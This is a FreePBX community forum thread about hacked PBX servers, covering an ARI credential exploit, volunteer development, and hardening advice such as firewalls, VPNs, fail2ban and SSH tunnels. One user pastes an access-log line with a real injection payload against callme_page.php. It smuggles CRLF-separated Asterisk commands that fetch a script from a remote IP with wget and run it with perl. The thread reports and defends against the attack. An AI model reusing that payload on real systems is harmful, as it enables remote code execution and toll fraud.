I've been hacked!

My quick two cents …

First, the changesets referenced here may or may not be related to the hack as there have been other vulnerabilities that have been introduced and since fixed, as this one has been since fixed for quite some time.

Spending time attacking and critisizing vs. constructively tracking down and and helping to find better solutions doesn’t really do anyone any good and in all reality, has a very negative affect on the project. If it does anything, it hurts everyone because volunteer developers simply choose to go elsewhere vs. take the un-warranted abuse that is doled out in such exchanges.

Everyone is human and they make mistakes. It’s Open Source and that is one of the great things about Open Source, it is viewable by everyone and thus collective minds can track things down. Reports of banks the size of Chase Manhattan being hacked is a perennial event in the news. These are institutions who’s IT budgets are counted in the BILLIONS of dollars. Given that, to make the insulting comments to members of this community that are being made here are simply un-called for. We are a community, let’s try to act that way please.

As far as the latest exploit that is likely responsible, it was published Monday, reported yesterday and fixed and published this morning. It allowed an unauthenticated user to obtain the ARI admin credentials, nothing beyond that though often those are set the same as the FreePBX Admin credentials and not changed.

@plindheimer So whats the process for getting involved then?

I don’t have a ton of time, but I can certainly give some time into assisting. My background is in php, mysql and security, I’m not claiming to be an expert in any of those areas, but I know enough to assist.

Even though its “open” there needs to be some delation and direction from the people on top for this. Ex. whats being worked on now, what things do you want us to check for security wise in the beta version, whats been checked alread, how do we keep track of who is working on what file at a time, if I find a change how do I submit it and make sure it doesn’t get overwritten by another developer?

abefroman,

There are a few questions here and it also really depends on the level of involvement and time that you or anyone else might be interested in putting in.

As far as tracking what is going on, there is a timeline in trac that can show every single checkin. It’s hard to really say exactly what’s being worked on as different developers attack different areas, problems and new features based on the various motivations, though everything still ends up in the timeline.

Trying to formalize a process or some sort of automation to screen security for a project like this is tough. Generally speaking, we’ve simply relied on the Open Source nature of the project where everything that happens is transparent and viewable by all as one line of scrutiny. As another, the beta testing process and our attempts to be as reactive as possible when things come out.

Since features are rarely introduced within a finalized release, the changes of introductions to such are much lower though there are plenty of incidents of security issues which are not noticed until something is final. In this case, 2.10 is close to final, in release candidate state and as such gets a lot more exposure.

The other consideration is, no matter how much emphasis put on security, we aren’t security experts though we are very sensitive to security. This is a PBX and it isn’t designed to be put on the web. However, we know people do so we don’t put our heads in the sand and say ‘lalala’ when it happens. None the less, it still remains that the only ‘real’ protection for security is ultimately locking down access because there are always going to be the potential issues that until reported remain out there.

If you are interested in a bigger involvement and possibly helping to lead up an effort, then the best next step is to talk with a couple of us and brainstorm what might be possible given the resources that you and others might be willing to provide. If you want to do that you can feel free to PM me and we can arrange something.

I will assume ( not always a good thing ) that you have some sort of firewall at the DC. You can control who can use SIP/RTP/HTTP etc for the IP of that PBX server or for anything behind that firewall. Without a doubt if you can VPN each location via the firewall then all phones appear to be internal and you can deny external sip traffic from everyone except your sip providers.

You can leave the web interface a little more open so that if you are lets say visiting another office you could make a change to your pbx. You can try changing the port for the web interface of your pbx from 80 to some random unused port. To access your box from the web you would type in name.tomypbxbox.com:105038 now you can use a smaller port number, but basically utilizing your firewall you would redirect the external 105038 port to the internal port 80. I don’t think anyone will be expecting those random ports with standard scanning tools.

If you don’t have a firewall then you are making a big mistake by not protecting yourself.

In a worse case if you don’t have a firewall you could change the default port for apache as well, not my first choice but effective.

Either way protect your box or someone will find a way to make free calls.

Hi Techies,

This issue is happened to one of my pbx. Without using webGUI password the hacker managed to create/modify trunks. I have no idea how he accomplish this but for sure there must be some bug in Apache or Freepbx scripts.

I was using 2.9 freepbx.

This is one of the log entry before hacker created one admin user. He never able to use the maint/admin password.

37.8.104.134 - - [04/Jul/2012:06:24:53 +0400] “GET /recordings/misc/callme_page.
php?action=c&callmenum=*011@from-internal/n%0D%0AApplication:%20system%0D%0AData
:%20wget%20%20http://109.169.86.186/a/dcm7.txt%20-O%20/tmp/back.txt;perl%20/tmp/
back.txt%0D%0A%0D%0A HTTP/1.1” 200 1129 “http://localhost/pbxm7.php?ip=my_external_ip&ext=*011” "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12

I could provide more details if anyone interested.

Regards,

I want to report one exploit please contact me any authorized personnel.

My e-id rahman at india dot com

It’s a holiday in the US. Please click “report bug/feature” on the right navigation bar and provide the information.

It will be looked into immediately.

Please send me a private message with the trac ticket number assigned when you open the bug.

Thanks…Scott

While I will be one of the first to admit jumping off at the deep end and screaming about an issue which was not anyone’s fault. I would like to be the one to point out, this is a community project and it is also FREE.

I love using the system and from time to time I find an issue, I report it, I get help to fix it. I do not recall PAYING anyone for the software, help and support apart from supporting the project by using SIPStation.

My point is this, the developers, programmers, testers are not paid by us unless it is a commercial thing. The guys work hard on this to bring this fine software to us, at little to no cost to the end user. Now if it was Cisco’s Unified Communications package and something went tits up, then you have a right to be pissed, did you ever price that package?

Everyone including myself knows to keep this service behind a tight firewall, although not perfect, it keeps the noob hacker out of your server. No matter what you do, someone, somewhere will eventually get in to your server. It is up to you to make it as secure as you possibly can.

I have had attempts on my server in the past, nothing major, nothing to get alarmed about and certainly nothing to go pointing fingers about. If you can’t secure YOUR server, then maybe you should hire someone to do it for you.

A large mistake people tend to make is using the defaults for every thing, change your port numbers around, they do not have to be ports 5060, and your 10000 to 20000 do not need to be opened up so far, why do you need 10000 open ports?.

If your needing access to your server from a remote position, use a VPN and make sure your passwords are unique, long and changed often.

I am not trying to offend anyone or stick up for anyone, but it is easy to push the blame on to someone else sometimes… I know this for a fact.

Thanks for the post, keep in mind that Cisco will not support a call manager exposed to the Internet. They won’t even open a case. If they find you have it connected to the Internet they will advise you it’s an administrative interface not designed to be connected to the Internet.

If you want to expose SIP to the Internet on CUCM they will sell you a SIP proxy license for a multi-service router. List price is $14,800

The FreePBX disro include fail2ban. Combined with good secrets and at least some firewall protection (at a minimum enable geo location services and only allow IP’s from the country you expect your users to register from!) the SIP thread has been mitigated somewhat.

The problem now is security holes in the GUI. FreePBX is a mash up of many developers work dating back 10 years. Holes are going to be found. Within the given resources they will be patched. It appears that there might be some validity to this threat of being able to add an admin account. I am sure the team will look into it and I will bring it up Monday morning.

However, there is no need to expose FreePBX admin to the Internet. If you need to remote admin use ssh (and change the port please) and Putty’s http proxy. It allows you to tunnel through the putty connection and access port 80 services on the remote network. You can even open up the web interface of phones reachable by the server you are ssh’d to! To make it even easier, Firefox proxy is standalone. Most browsers change Windows Internet settings, Firefox does not. I leave firefox setup for a socks proxy on localhost port 8081 (same as I have my putty default config) and then use Chrome and IE as my browsers. The only issue is if you have multiple putty sessions make sure you only have one setup as the socks proxy or you will have issues.

Thanks again for the post.

AstroGuru,

I’m sorry that your system was hacked by this vulnerability.

This is a known vulnerability that has been fixed and updates have been available for several months now. The fixes were not only provided on the currently supported releases, but on every release prior that had this vulnerability exposed.

The vulnerable module for this issue was the fw_ari which is the user portal (ARI).

put this text in ANY of their installers and documents

ule #7: Minimize Web Access To Your PBX. Most of the Asterisk aggregations utilize FreePBX as the graphical user interface to configure your Asterisk PBX. Because FreePBX is web-based, it is extremely dangerous to leave it exposed on the Internet. As much as we love FreePBX, keep in mind that it was written by dozens and dozens of contributors of various skill levels over a very long period of time. Spaghetti code doesn’t begin to describe some of what lies under the FreePBX covers. Make absolutely certain that you have .htaccess password protection in place for all web directories in at least these directory trees: admin, maint, meetme, and panel.

Our rule of thumb on Internet web accessibility to an Asterisk PBX goes like this. Don’t! But, if you must, build as many layers of protection as possible to assure that your system is not compromised. If the bad guys get into FreePBX, the security of your PBX has been compromised… permanently! This means you need to start over with all-new passwords by installing a fresh system. You simply cannot fix every possible hole that has been opened on a FreePBX-compromised system!